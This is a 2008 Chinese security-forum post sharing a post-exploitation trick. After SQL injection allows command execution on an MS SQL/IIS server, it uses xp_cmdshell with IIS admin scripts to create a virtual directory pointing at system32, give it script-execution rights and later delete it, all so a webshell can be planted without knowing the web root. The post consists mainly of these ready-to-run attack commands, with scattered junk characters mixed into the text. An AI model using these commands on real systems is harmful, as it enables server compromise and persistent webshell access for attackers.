|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
- U5 R3 ~; v" P1 o7 S' {" I: e1 f6 I& t _, I. Z6 J$ U1 \5 c0 j9 @
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"' j8 f5 B7 T5 c# b& v. S
建立虚拟目录win,指向c:\windows\system329 J9 w, _ X* q3 s" P( ^
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'1 |! F0 G$ E x9 q* Z6 c( Y% e
让win句有解析asp脚本权限" [5 u# V6 b- _6 y
3 y# s3 m) L% o! l7 r# p0 P
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
+ P7 \& Z4 i I- }9 w& m# P J删除虚拟目录。$ m2 b) y! f, a N) P( }# ~
找不到web绝对路径的一种解决办法,$ W/ U$ M( ]3 r3 m; T- m5 W
1 I8 z/ ~$ U- ]+ E$ ~9 B403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
